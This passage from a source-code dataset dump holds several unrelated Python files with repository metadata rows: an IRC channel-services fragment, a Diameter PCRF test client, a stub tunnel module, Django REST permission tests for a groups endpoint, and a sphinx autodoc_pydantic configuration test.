                                        self.send_msg_as("chanop", "NOTICE", username, "ERROR: You must be the channel owner to drop it.")
                                else:
                                    self.send_msg_as("chanop", "NOTICE", username, "ERROR: Channel {} is not registered.\n".format(chan))
                        else:
                            self.send_msg_as("chanop", "NOTICE", username, "ERROR: Channel {} is not a valid channel name.\n".format(chan))
                    else:
                        self.send_msg_as("chanop", "NOTICE", username, "ERROR: {} has not identified to services.\n".format(username))
                else:
                    self.send_msg_as("chanop", "NOTICE", username, "ERROR: {} is not a registered nickname.\n".format(username))
    else:
        self.send_msg_as("chanop", "NOTICE", username, "ERROR: SYNTAX for drop: /msg ChanOP drop <channel>\n")
def process_chanop_help(self, prefix, command, params):
    username = prefix[1:]
    hpath = "./help/chanop/"
    if len(params) == 2:
        with open(hpath + "help.txt", 'r') as hfile:
            lines = hfile.readlines()
        for line in lines:
            if len(line) > 0:
                self.send_msg_as("chanop", "NOTICE", username, line.strip())
    if len(params) > 2:
        helpfiles = {
            "registration": "registration.txt",
            "register": "register.txt",
            "drop": "drop.txt",
            "modes": "set_modes.txt",
            "op": "op.txt",
            "deop": "deop.txt",
            "database": "database.txt",
            "adduser": "adduser.txt",
            "deluser": "deluser.txt",
            "setuser": "setuser.txt",
            "access": "access.txt"
        }
        topic = params[2].lower().strip()
        valid_file = False
        try:
            hfilesz = hpath + helpfiles[topic]
            valid_file = True
        except KeyError:
            valid_file = False
            print("no help file")
        if valid_file:
            with open(hfilesz, 'r') as hfile:
                lines = hfile.readlines()
            for line in lines:
                if len(line.strip()) != 0:
                    self.send_msg_as("chanop", "NOTICE", username, line.strip())
        else:
            self.send_msg_as("chanop", "NOTICE", username, f"ERROR: No valid help topic for {topic} found")
def process_chanop_commands(self, prefix, command, params):
    chan = ''
    cmdp = ''
    if len(params) >= 2:
        chan = params[0]
        cmdp = params[1].strip()
    if command == 'PRIVMSG' and chan[:1] == '#' and cmdp[:2] == ':`' and len(params) >= 2:
        try:
            # Strip the leading ':`' marker to get the command name
            cmd = cmdp[2:]
            self.dispatch[cmd](self, prefix, command, params)
        except KeyError:
            return
    if command == 'PRIVMSG' and params[0] == '00000000A' and self.spawned_chanop == True:
        try:
            # Strip the leading ':' to get the command name
            cmd = cmdp[1:]
            self.dispatchpriv[cmd](self, prefix, command, params)
        except KeyError:
            return
| 55.891691 | 201 | 0.346515 | 7,330 | 97,531 | 4.498772 | 0.042156 | 0.029355 | 0.030022 | 0.03548 | 0.842128 | 0.825358 | 0.806587 | 0.799521 | 0.785298 | 0.774503 | 0 | 0.017911 | 0.566661 | 97,531 | 1,745 | 202 | 55.891691 | 0.762327 | 0.000154 | 0 | 0.767341 | 0 | 0.005058 | 0.115324 | 0.0007 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014451 | false | 0.002168 | 0.002168 | 0 | 0.019509 | 0.047688 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
f7750e009ef6c40a2a5f300c8229d0008734adb4 | 10,459 | py | Python | PCRF_sim/tests_CCR-I-U-T.py | fertiland/pyprotosim | b329c060f1cd521e264da8416249a02429f432f3 | [
"BSD-2-Clause"
] | 12 | 2017-11-07T12:45:43.000Z | 2022-02-10T12:36:49.000Z | PCRF_sim/tests_CCR-I-U-T.py | fertiland/pyprotosim | b329c060f1cd521e264da8416249a02429f432f3 | [
"BSD-2-Clause"
] | 1 | 2019-02-12T09:25:55.000Z | 2019-02-12T09:25:55.000Z | PCRF_sim/tests_CCR-I-U-T.py | fertiland/pyprotosim | b329c060f1cd521e264da8416249a02429f432f3 | [
"BSD-2-Clause"
] | 5 | 2018-09-19T09:46:50.000Z | 2020-08-20T09:46:53.000Z | #!/usr/bin/python
##################################################################
# Copyright (c) 2012, Sergej Srepfler <sergej.srepfler@gmail.com>
# Test client added by L.Belov <lavrbel@gmail.com>
# February 2012 - March 2014
# Version 0.1.1, Last change on Mar 11, 2014
# This software is distributed under the terms of BSD license.
##################################################################
# These are 5 CCR tests for using with and without LDAP database.
#Next two lines are to include parent directory for testing
import sys
import socket
sys.path.append("..")
from libDiameter import *
if __name__ == '__main__':
    # SET THIS TO PCRF SIMULATOR IP/PORT
    HOST='127.0.0.1'
    PORT=3868
    Conn=Connect(HOST,PORT)
    LoadDictionary("../dictDiameter.xml")
    # TEST 1 -- SEND CCR-I TO PCRF with MSISDN FOUND in SPR database
    print "TEST 1 -- SEND CCR-I TO PCRF with IDENTITY(MSISDN) WHICH IS FOUND in SPR LDAP database"
    CCR_avps=[]
    CCR_avps.append(encodeAVP('Origin-Host', 'pgw.myrealm.example'))
    CCR_avps.append(encodeAVP('Session-Id', 'pgw.myrealm.example;1094791309121_1385989500_428022'))
    CCR_avps.append(encodeAVP('Called-Station-Id', 'test.apn'))
    CCR_avps.append(encodeAVP('Origin-Realm', 'myrealm.example'))
    CCR_avps.append(encodeAVP('Destination-Realm', 'myrealm.example'))
    CCR_avps.append(encodeAVP('Destination-Host', 'pcrf.myrealm.example'))
    CCR_avps.append(encodeAVP('Auth-Application-Id', 16777238))
    CCR_avps.append(encodeAVP('CC-Request-Type', 1))
    CCR_avps.append(encodeAVP('CC-Request-Number', 0))
    CCR_avps.append(encodeAVP('Subscription-Id',[encodeAVP('Subscription-Id-Data', '1234567890'), encodeAVP('Subscription-Id-Type', 0)]))
    CCR_avps.append(encodeAVP('Subscription-Id',[encodeAVP('Subscription-Id-Data', '123456789101112'), encodeAVP('Subscription-Id-Type', 1)]))
    CCR_avps.append(encodeAVP('Framed-IP-Address', '192.168.0.1'))
    # 3GPP Gx=16777238
    # Create message header (empty)
    CCR=HDRItem()
    # Set command code
    CCR.cmd=dictCOMMANDname2code('Credit-Control')
    # Set Hop-by-Hop and End-to-End
    initializeHops(CCR)
    # Add AVPs to header and calculate remaining fields
    msg1=createReq(CCR,CCR_avps)
    # msg now contains CCR Request as hex string
    # send data
    Conn.send(msg1.decode('hex'))
    # Receive response
    received1 = Conn.recv(1024)
    # Parse and display received ANSWER
    print "="*30
    print "THE ANSWER IS:"
    msg=received1.encode('hex')
    print "="*30
    H=HDRItem()
    stripHdr(H,msg)
    avps=splitMsgAVPs(H.msg)
    cmd=dictCOMMANDcode2name(H.flags,H.cmd)
    if cmd==ERROR:
        print 'Unknown command',H.cmd
    else:
        print cmd
    print "Hop-by-Hop=",H.HopByHop,"End-to-End=",H.EndToEnd,"ApplicationId=",H.appId
    print "="*30
    for avp in avps:
        # print "RAW AVP",avp
        print "Decoded AVP",decodeAVP(avp)
    print "-"*30
    # END OF TEST 1
    # TEST 2 -- SEND CCR-I TO PCRF with ANOTHER MSISDN FOUND in SPR database
    print "TEST 2 -- SEND ANOTHER CCR-I TO PCRF with USER FOUND in SPR database"
    CCR_avps=[]
    CCR_avps.append(encodeAVP('Origin-Host', 'pgw.myrealm.example'))
    CCR_avps.append(encodeAVP('Session-Id', 'pgw.myrealm.example;1093791309121_1385989500_4280888'))
    CCR_avps.append(encodeAVP('Called-Station-Id', 'test.apn'))
    CCR_avps.append(encodeAVP('Origin-Realm', 'myrealm.example'))
    CCR_avps.append(encodeAVP('Destination-Realm', 'myrealm.example'))
    CCR_avps.append(encodeAVP('Destination-Host', 'pcrf.myrealm.example'))
    CCR_avps.append(encodeAVP('Auth-Application-Id', 16777238))
    CCR_avps.append(encodeAVP('CC-Request-Type', 1))
    CCR_avps.append(encodeAVP('CC-Request-Number', 0))
    CCR_avps.append(encodeAVP('Framed-IP-Address', '192.168.0.2'))
    CCR_avps.append(encodeAVP('Subscription-Id',[encodeAVP('Subscription-Id-Data', '1234567891'), encodeAVP('Subscription-Id-Type', 0)]))
    CCR_avps.append(encodeAVP('Subscription-Id',[encodeAVP('Subscription-Id-Data', '123456789101113'), encodeAVP('Subscription-Id-Type', 1)]))
    # 3GPP Gx=16777238
    # Create message header (empty)
    CCR=HDRItem()
    # Set command code
    CCR.cmd=dictCOMMANDname2code('Credit-Control')
    # Set Hop-by-Hop and End-to-End
    initializeHops(CCR)
    # Add AVPs to header and calculate remaining fields
    msg1=createReq(CCR,CCR_avps)
    # msg now contains CCR Request as hex string
    # send data
    Conn.send(msg1.decode('hex'))
    # Receive response
    received1 = Conn.recv(1024)
    # Parse and display received ANSWER
    print "="*30
    print "THE ANSWER IS:"
    msg=received1.encode('hex')
    print "="*30
    H=HDRItem()
    stripHdr(H,msg)
    avps=splitMsgAVPs(H.msg)
    cmd=dictCOMMANDcode2name(H.flags,H.cmd)
    if cmd==ERROR:
        print 'Unknown command',H.cmd
    else:
        print cmd
    print "Hop-by-Hop=",H.HopByHop,"End-to-End=",H.EndToEnd,"ApplicationId=",H.appId
    print "="*30
    for avp in avps:
        # print "RAW AVP",avp
        print "Decoded AVP",decodeAVP(avp)
    print "-"*30
    # END OF TEST 2
    # TEST 3 -- SEND CCR-U TO PCRF with USER FOUND in SPR database
    print "TEST 3 -- SEND CCR-U TO PCRF with VALID USER FOUND in SPR database"
    CCR_avps=[]
    CCR_avps.append(encodeAVP('Origin-Host', 'pgw.myrealm.example'))
    CCR_avps.append(encodeAVP('Session-Id', 'pgw.myrealm.example;1094791309121_1385989500_428022'))
    CCR_avps.append(encodeAVP('Called-Station-Id', 'test.apn'))
    CCR_avps.append(encodeAVP('Origin-Realm', 'myrealm.example'))
    CCR_avps.append(encodeAVP('Destination-Realm', 'myrealm.example'))
    CCR_avps.append(encodeAVP('Destination-Host', 'pcrf.myrealm.example'))
    CCR_avps.append(encodeAVP('Auth-Application-Id', 16777238))
    CCR_avps.append(encodeAVP('CC-Request-Type', 2))
    CCR_avps.append(encodeAVP('CC-Request-Number', 0))
    CCR_avps.append(encodeAVP('Framed-IP-Address', '192.168.0.1'))
    CCR_avps.append(encodeAVP('Subscription-Id',[encodeAVP('Subscription-Id-Data', '1234567891'), encodeAVP('Subscription-Id-Type', 0)]))
    CCR_avps.append(encodeAVP('Subscription-Id',[encodeAVP('Subscription-Id-Data', '123456789101114'), encodeAVP('Subscription-Id-Type', 1)]))
    # 3GPP Gx=16777238
    # Create message header (empty)
    CCR=HDRItem()
    # Set command code
    CCR.cmd=dictCOMMANDname2code('Credit-Control')
    # Set Hop-by-Hop and End-to-End
    initializeHops(CCR)
    # Add AVPs to header and calculate remaining fields
    msg1=createReq(CCR,CCR_avps)
    # msg now contains CCR Request as hex string
    # send data
    Conn.send(msg1.decode('hex'))
    # Receive response
    received1 = Conn.recv(1024)
    # Parse and display received ANSWER
    print "="*30
    print "THE ANSWER IS:"
    msg=received1.encode('hex')
    print "="*30
    H=HDRItem()
    stripHdr(H,msg)
    avps=splitMsgAVPs(H.msg)
    cmd=dictCOMMANDcode2name(H.flags,H.cmd)
    if cmd==ERROR:
        print 'Unknown command',H.cmd
    else:
        print cmd
    print "Hop-by-Hop=",H.HopByHop,"End-to-End=",H.EndToEnd,"ApplicationId=",H.appId
    print "="*30
    for avp in avps:
        # print "RAW AVP",avp
        print "Decoded AVP",decodeAVP(avp)
    print "-"*30
    # END OF TEST 3
    # TEST 4 -- SEND CCR-I TO PCRF when USER IS NOT FOUND in SPR database
    print "TEST 4 -- SEND CCR-I TO PCRF with USER NOT FOUND in SPR database"
    print "Expect 5003 AVP"
    CCR_avps=[]
    CCR_avps.append(encodeAVP('Origin-Host', 'pgw.myrealm.example'))
    CCR_avps.append(encodeAVP('Session-Id', 'pgw.myrealm.example;1093791309121_1385989500_426543'))
    CCR_avps.append(encodeAVP('Called-Station-Id', 'test.apn'))
    CCR_avps.append(encodeAVP('Origin-Realm', 'myrealm.example'))
    CCR_avps.append(encodeAVP('Destination-Realm', 'myrealm.example'))
    CCR_avps.append(encodeAVP('Destination-Host', 'pcrf.myrealm.example'))
    CCR_avps.append(encodeAVP('Auth-Application-Id', 16777238))
    CCR_avps.append(encodeAVP('CC-Request-Type', 1))
    CCR_avps.append(encodeAVP('CC-Request-Number', 0))
    CCR_avps.append(encodeAVP('Framed-IP-Address', '192.168.0.11'))
    # We do not have this user in our SPR database:
    CCR_avps.append(encodeAVP('Subscription-Id',[encodeAVP('Subscription-Id-Data', '1234567894'), encodeAVP('Subscription-Id-Type', 0)]))
    CCR_avps.append(encodeAVP('Subscription-Id',[encodeAVP('Subscription-Id-Data', '123456789101115'), encodeAVP('Subscription-Id-Type', 1)]))
    # 3GPP Gx=16777238
    # Create message header (empty)
    CCR=HDRItem()
    # Set command code
    CCR.cmd=dictCOMMANDname2code('Credit-Control')
    # Set Hop-by-Hop and End-to-End
    initializeHops(CCR)
    # Add AVPs to header and calculate remaining fields
    msg1=createReq(CCR,CCR_avps)
    # msg now contains CCR Request as hex string
    # send data
    Conn.send(msg1.decode('hex'))
    # Receive response
    received1 = Conn.recv(1024)
    # Parse and display received ANSWER
    print "="*30
    print "THE ANSWER IS:"
    msg=received1.encode('hex')
    print "="*30
    H=HDRItem()
    stripHdr(H,msg)
    avps=splitMsgAVPs(H.msg)
    cmd=dictCOMMANDcode2name(H.flags,H.cmd)
    if cmd==ERROR:
        print 'Unknown command',H.cmd
    else:
        print cmd
    print "Hop-by-Hop=",H.HopByHop,"End-to-End=",H.EndToEnd,"ApplicationId=",H.appId
    print "="*30
    for avp in avps:
        # print "RAW AVP",avp
        print "Decoded AVP",decodeAVP(avp)
    print "-"*30
    # END OF TEST 4
    # TEST 5 - SEND CCR-T REQUEST FROM CLIENT
    print "==========SEND CCR-T request originated from user========="
    print "TEST 5 -- SEND CCR-T TO PCRF session termination"
    CCR_avps=[]
    CCR_avps.append(encodeAVP('Origin-Host', 'pgw.myrealm.example'))
    CCR_avps.append(encodeAVP('Session-Id', 'pgw.myrealm.example;1094791309121_1385989500_428022'))
    CCR_avps.append(encodeAVP('Called-Station-Id', 'test.apn'))
    CCR_avps.append(encodeAVP('Origin-Realm', 'myrealm.example'))
    CCR_avps.append(encodeAVP('Destination-Realm', 'myrealm.example'))
    CCR_avps.append(encodeAVP('Destination-Host', 'pcrf.myrealm.example'))
    CCR_avps.append(encodeAVP('Auth-Application-Id', 16777238))
    CCR_avps.append(encodeAVP('CC-Request-Type', 3))
    CCR_avps.append(encodeAVP('CC-Request-Number', 0))
    CCR_avps.append(encodeAVP('Framed-IP-Address', '192.168.0.1'))
    CCR_avps.append(encodeAVP('Subscription-Id',[encodeAVP('Subscription-Id-Data', '1234567891'), encodeAVP('Subscription-Id-Type', 0)]))
    CCR_avps.append(encodeAVP('Subscription-Id',[encodeAVP('Subscription-Id-Data', '123456789101114'), encodeAVP('Subscription-Id-Type', 1)]))
    CCR=HDRItem()
    CCR.cmd=dictCOMMANDname2code('Credit-Control')
    initializeHops(CCR)
    msg3=createReq(CCR,CCR_avps)
    Conn.send(msg3.decode('hex'))
    # Receive response
    received3 = Conn.recv(1024)
    # Parse and display received ANSWER
    print "="*30
    print "THE ANSWER IS:"
    msg=received3.encode('hex')
    print "="*30
    H=HDRItem()
    stripHdr(H,msg)
    avps=splitMsgAVPs(H.msg)
    cmd=dictCOMMANDcode2name(H.flags,H.cmd)
    if cmd==ERROR:
        print 'Unknown command',H.cmd
    else:
        print cmd
    print "Hop-by-Hop=",H.HopByHop,"End-to-End=",H.EndToEnd,"ApplicationId=",H.appId
    print "="*30
    for avp in avps:
        # print "RAW AVP",avp
        print "Decoded AVP",decodeAVP(avp)
    print "-"*30
| 34.179739 | 138 | 0.734965 | 1,534 | 10,459 | 4.953716 | 0.133638 | 0.064482 | 0.102645 | 0.173707 | 0.887748 | 0.878931 | 0.863403 | 0.850243 | 0.833926 | 0.833926 | 0 | 0.057849 | 0.094273 | 10,459 | 305 | 139 | 34.291803 | 0.744326 | 0.189311 | 0 | 0.841837 | 0 | 0.005102 | 0.370594 | 0.030903 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.015306 | null | null | 0.265306 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
e3d1f2d0f743b078f488320eb18045a08b815e6e | 202 | py | Python | code/default/gae_proxy/local/ipv6_tunnel/unknown.py | wuyongwen/XX-Net | 313aefd862b8f230f7c61dc29db1b2b93a17e6ab | [
"BSD-2-Clause"
] | null | null | null | code/default/gae_proxy/local/ipv6_tunnel/unknown.py | wuyongwen/XX-Net | 313aefd862b8f230f7c61dc29db1b2b93a17e6ab | [
"BSD-2-Clause"
] | null | null | null | code/default/gae_proxy/local/ipv6_tunnel/unknown.py | wuyongwen/XX-Net | 313aefd862b8f230f7c61dc29db1b2b93a17e6ab | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python2
# coding:utf-8
import os
import sys
from .common import *
def state():
    return "Developing"

def enable():
    return "Developing"

def disable():
    return "Developing"
| 10.631579 | 23 | 0.663366 | 26 | 202 | 5.153846 | 0.692308 | 0.358209 | 0.283582 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012579 | 0.212871 | 202 | 18 | 24 | 11.222222 | 0.830189 | 0.168317 | 0 | 0.333333 | 0 | 0 | 0.180723 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 7 |
540a4946ca86b0951510a1ab8f78cc845701ed7e | 13,486 | py | Python | api/tests/tests_groups_route.py | djeni98/central-erros-back | 5d81e47df99685b4a470df56e62ff2c537fc3a52 | [
"MIT"
] | null | null | null | api/tests/tests_groups_route.py | djeni98/central-erros-back | 5d81e47df99685b4a470df56e62ff2c537fc3a52 | [
"MIT"
] | 1 | 2021-04-08T21:16:15.000Z | 2021-04-08T21:16:15.000Z | api/tests/tests_groups_route.py | djeni98/central-erros-back | 5d81e47df99685b4a470df56e62ff2c537fc3a52 | [
"MIT"
] | 1 | 2020-07-14T12:52:07.000Z | 2020-07-14T12:52:07.000Z | from api.tests.TestCase import TestCase, PermissionUtilities
from rest_framework import status
from rest_framework.test import APIClient
from logs.models import Group, Permission
class GroupRouteCase(TestCase, PermissionUtilities):
    invalid_group = {
        'name': 'group' + 'g' * 150
    }
    simple_valid_group = {
        'name': 'simple group'
    }
    full_valid_group = {
        'name': 'view all resources',
        # permissions declared in setUp
    }
    route = '/api/groups/'

    def setUp(self):
        self.client = APIClient()
        self.create_users_with_permissions(Group)

        self.groups_list = []
        for i in range(10):
            group = Group.objects.create(name=f'group{i+1}')
            self.groups_list.append(group)

        self.full_valid_group['permissions'] = [
            p.id for p in Permission.objects.filter(codename__contains='view')
        ]
    def test_list_group(self):
        response = self.client.get(f'{self.route}')
        with self.subTest('Must return Unauthorized', response=response):
            self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
            body = response.json()
            self.assertIn('detail', body)
            self.assertIn('authentication', body.get('detail').lower())

        self.login(permission='delete')
        response = self.client.get(f'{self.route}')
        with self.subTest('Must return Forbidden', response=response):
            self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
            body = response.json()
            self.assertIn('detail', body)
            self.assertIn('permission', body.get('detail').lower())

        self.login(permission='view')
        response = self.client.get(f'{self.route}')
        with self.subTest('Must return data and a success code', response=response):
            groups = response.json()
            for i, group in enumerate(groups):
                expected_group = self.groups_list[i]
                self.assertEqual(expected_group.name, group.get('name'))
                expected_group_permissions = [p.id for p in expected_group.permissions.all()]
                self.assertEqual(expected_group_permissions, group.get('permissions'))
    def test_create_group(self):
        response = self.client.post(f'{self.route}', data={}, format='json')
        with self.subTest('Must return Unauthorized', response=response):
            self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
            body = response.json()
            self.assertIn('detail', body)
            self.assertIn('authentication', body.get('detail').lower())

        self.login(permission='delete')
        response = self.client.post(f'{self.route}', data={}, format='json')
        with self.subTest('Must return Forbidden', response=response):
            self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
            body = response.json()
            self.assertIn('detail', body)
            self.assertIn('permission', body.get('detail').lower())

        self.login(permission='add')
        response = self.client.post(f'{self.route}', data={}, format='json')
        with self.subTest('Name must be required', response=response):
            self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
            body = response.json()
            self.assertIn('name', body)
            self.assertSubstringIn('required', body.get('name'))

        response = self.client.post(f'{self.route}', data=self.invalid_group, format='json')
        with self.subTest('Name must be valid', response=response):
            self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
            body = response.json()
            self.assertIn('name', body)
            self.assertSubstringIn('Ensure', body.get('name'))

        data = self.simple_valid_group
        response = self.client.post(f'{self.route}', data=data, format='json')
        with self.subTest('Group must be created with only required fields', response=response):
            self.assertEqual(response.status_code, status.HTTP_201_CREATED)
            group = response.json()
            self.assertEqual(data.get('name'), group.get('name'))

            expected_groups = len(self.groups_list) + 1
            db_groups = Group.objects.count()
            self.assertEqual(expected_groups, db_groups)

        data = self.full_valid_group
        response = self.client.post(f'{self.route}', data=data, format='json')
        with self.subTest('Group must be created with all fields', response=response):
            self.assertEqual(response.status_code, status.HTTP_201_CREATED)
            group = response.json()
            self.assertEqual(data.get('name'), group.get('name'))

            expected_groups = len(self.groups_list) + 2
            db_groups = Group.objects.count()
            self.assertEqual(expected_groups, db_groups)
    def test_list_one_group(self):
        pk = len(self.groups_list) + 2
        response = self.client.get(f'{self.route}{pk}/')
        with self.subTest('Must return Unauthorized', response=response):
            self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
            body = response.json()
            self.assertIn('detail', body)
            self.assertIn('authentication', body.get('detail').lower())

        self.login(permission='delete')
        response = self.client.get(f'{self.route}{pk}/')
        with self.subTest('Must return Forbidden', response=response):
            self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
            body = response.json()
            self.assertIn('detail', body)
            self.assertIn('permission', body.get('detail').lower())

        self.login(permission='view')
        response = self.client.get(f'{self.route}{pk}/')
        with self.subTest('List must return not found', response=response):
            self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
            self.assertIn('detail', response.json())
            self.assertIn('not found', response.json().get('detail').lower())

        pk = 2
        response = self.client.get(f'{self.route}{pk}/')
        with self.subTest('Must return the correct group', response=response):
            self.assertEqual(response.status_code, status.HTTP_200_OK)
            group = response.json()
            expected_group = self.groups_list[pk-1]
            self.assertEqual(pk, group.get('id'))
            self.assertEqual(expected_group.id, group.get('id'))
            self.assertEqual(expected_group.name, group.get('name'))
    def test_update_group(self):
        pk = len(self.groups_list) + 2
        response = self.client.put(f'{self.route}{pk}/', data={}, format='json')
        with self.subTest('Must return Unauthorized', response=response):
            self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
            body = response.json()
            self.assertIn('detail', body)
            self.assertIn('authentication', body.get('detail').lower())

        self.login(permission='delete')
        response = self.client.put(f'{self.route}{pk}/', data={}, format='json')
        with self.subTest('Must return Forbidden', response=response):
            self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
            body = response.json()
            self.assertIn('detail', body)
            self.assertIn('permission', body.get('detail').lower())

        self.login(permission='change')
        response = self.client.put(f'{self.route}{pk}/', data={}, format='json')
        with self.subTest('Update must return not found', response=response):
            self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
            self.assertIn('detail', response.json())
            self.assertIn('not found', response.json().get('detail').lower())

        pk = 2
        response = self.client.put(f'{self.route}{pk}/', data={}, format='json')
        with self.subTest('Name must be required', response=response):
            self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
            body = response.json()
            self.assertIn('name', body)
            self.assertSubstringIn('required', body.get('name'))

        data = self.invalid_group
        response = self.client.put(f'{self.route}{pk}/', data=data, format='json')
        with self.subTest('Name must be valid', response=response):
            self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
            body = response.json()
            self.assertIn('name', body)
            self.assertSubstringIn('Ensure', body.get('name'))

        data = self.full_valid_group
        response = self.client.put(f'{self.route}{pk}/', data=data, format='json')
        with self.subTest('Group must be updated', response=response):
            self.assertEqual(response.status_code, status.HTTP_200_OK)
            group = response.json()
            expected_group = self.groups_list[pk-1]
            self.assertEqual(pk, group.get('id'))
            self.assertEqual(expected_group.id, group.get('id'))
            self.assertEqual(data.get('name'), group.get('name'))
            self.assertEqual(data.get('permissions'), group.get('permissions'))
            self.assertNotEqual(expected_group.name, group.get('name'))
def test_partial_update_group(self):
pk = len(self.groups_list) + 2
response = self.client.patch(f'{self.route}{pk}/', data={}, format='json')
with self.subTest('Must return Unauthorized', response=response):
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
body = response.json()
self.assertIn('detail', body)
self.assertIn('authentication', body.get('detail').lower())
self.login(permission='delete')
response = self.client.patch(f'{self.route}{pk}/', data={}, format='json')
with self.subTest('Must return Forbidden', response=response):
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
body = response.json()
self.assertIn('detail', body)
self.assertIn('permission', body.get('detail').lower())
self.login(permission='change')
response = self.client.patch(f'{self.route}{pk}/', data={}, format='json')
with self.subTest('Partial update must return not found', response=response):
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
self.assertIn('detail', response.json())
self.assertIn('not found', response.json().get('detail').lower())
pk = 2
data = {'name': self.invalid_group.get('name')}
response = self.client.patch(f'{self.route}{pk}/', data=data, format='json')
with self.subTest('Field must be valid', response=response):
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
body = response.json()
self.assertIn('name', body)
self.assertSubstringIn('Ensure', body.get('name'))
data = {'name': self.full_valid_group.get('name')}
response = self.client.patch(f'{self.route}{pk}/', data=data, format='json')
with self.subTest('Group must be partial updated', response=response):
self.assertEqual(response.status_code, status.HTTP_200_OK)
group = response.json()
expected_group = self.groups_list[pk-1]
self.assertEqual(pk, group.get('id'))
self.assertEqual(expected_group.id, group.get('id'))
self.assertEqual(data.get('name'), group.get('name'))
self.assertNotEqual(expected_group.name, group.get('name'))
def test_delete_group(self):
pk = len(self.groups_list) + 2
response = self.client.delete(f'{self.route}{pk}/')
with self.subTest('Must return Unauthorized', response=response):
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
body = response.json()
self.assertIn('detail', body)
self.assertIn('authentication', body.get('detail').lower())
self.login(permission='add')
response = self.client.delete(f'{self.route}{pk}/')
with self.subTest('Must return Forbidden', response=response):
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
body = response.json()
self.assertIn('detail', body)
self.assertIn('permission', body.get('detail').lower())
self.login(permission='delete')
response = self.client.delete(f'{self.route}{pk}/')
with self.subTest('Delete must return not found', response=response):
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
self.assertIn('detail', response.json())
self.assertIn('not found', response.json().get('detail').lower())
pk = 2
response = self.client.delete(f'{self.route}{pk}/')
with self.subTest('Group must be deleted', response=response):
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
total_groups = len(self.groups_list) - 1
db_groups = Group.objects.count()
self.assertEqual(total_groups, db_groups)
self.assertRaises(Group.DoesNotExist, Group.objects.get, pk=pk)
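The methods above repeat a fixed progression (anonymous → wrong permission → missing object → success), with each expectation wrapped in `subTest` so one failing check does not abort the rest. A minimal, self-contained sketch of that pattern; the `PatternDemo` class and its data are illustrative stand-ins, not part of this project:

```python
import unittest

class PatternDemo(unittest.TestCase):
    # Hypothetical stand-in for the API checks above: each expected status
    # code is asserted inside its own subTest, so every case is reported
    # even if an earlier one fails.
    def test_status_codes(self):
        expectations = {'anonymous': 401, 'wrong permission': 403, 'missing object': 404}
        for label, code in expectations.items():
            with self.subTest(label, code=code):
                self.assertIn(code, (401, 403, 404))

suite = unittest.defaultTestLoader.loadTestsFromTestCase(PatternDemo)
result = unittest.TestResult()
suite.run(result)
print(result.wasSuccessful())  # → True
```

A plain loop of asserts would stop at the first failure; `subTest` keeps the remaining labelled cases running and reports each one separately.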
# tests/test_configuration_fields.py (repo: mansenfranzen/sphinx.ext.autodoc_pydantic, MIT license)
"""This module contains tests for pydantic validator configurations.
"""
import pydantic
import pytest
from sphinx.addnodes import (
    desc,
    desc_signature,
    desc_name,
    desc_content,
    desc_annotation,
    desc_addname,
    index
)
from sphinx.testing.util import assert_node

from sphinxcontrib.autodoc_pydantic import PydanticFieldDocumenter
from .compatibility import desc_annotation_default_value, \
    desc_annotation_directive_prefix

KWARGS = dict(documenter=PydanticFieldDocumenter.directivetype,
              deactivate_all=True)


def test_autodoc_pydantic_field_list_validators_true(autodocument):
    kwargs = dict(object_path='target.configuration.FieldListValidators.field',
                  **KWARGS)

    result = [
        '',
        '.. py:pydantic_field:: FieldListValidators.field',
        '   :module: target.configuration',
        '   :type: int',
        '',
        '   Field.',
        '',
        '   :Validated by:',
        '      - :py:obj:`check <target.configuration.FieldListValidators.check>`',
        ''
    ]

    # explicit global
    actual = autodocument(
        options_app={"autodoc_pydantic_field_list_validators": True},
        **kwargs)
    assert result == actual

    # explicit local
    actual = autodocument(
        options_doc={"field-list-validators": True},
        **kwargs)
    assert result == actual

    # explicit local overwrite global
    actual = autodocument(
        options_app={"autodoc_pydantic_field_list_validators": False},
        options_doc={"field-list-validators": True},
        **kwargs)
    assert result == actual


